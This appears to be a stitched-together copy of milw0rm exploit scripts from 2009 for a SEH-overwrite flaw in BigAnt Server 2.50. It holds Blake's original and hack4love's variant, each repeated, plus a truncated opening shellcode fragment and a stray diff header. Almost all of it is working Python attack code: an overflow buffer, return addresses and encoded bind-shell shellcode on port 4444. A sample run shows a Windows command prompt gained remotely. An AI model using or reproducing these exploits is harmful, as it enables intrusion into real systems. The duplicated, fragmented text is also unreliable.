"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")
payload = "\x41" * 985 # seh overwritten at 989
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
nops = "\x90" * 10 # nop sled
sc = shellcode # 710 bytes available for shellcode
print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)
print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"
# milw0rm.com [2009-09-15]
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")
payload = "\x41" * 985 # seh overwritten at 989
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
nops = "\x90" * 10 # nop sled
sc = shellcode # 710 bytes available for shellcode
print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)
print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"
# milw0rm.com [2009-09-15]


@ -1,62 +1,62 @@
#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
payload = "\x41" * 985
next_seh = "\xeb\x06\x90\x90"
seh = "\xc3\x20\xc4\x6b" #MFC42.DLL
nops = "\x90" * 10
sec = shellcode
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)
print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sec + "\r\n\r\n")
s.close()
# milw0rm.com [2009-09-15]
#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
payload = "\x41" * 985
next_seh = "\xeb\x06\x90\x90"
seh = "\xc3\x20\xc4\x6b" #MFC42.DLL
nops = "\x90" * 10
sec = shellcode
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)
print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sec + "\r\n\r\n")
s.close()
# milw0rm.com [2009-09-15]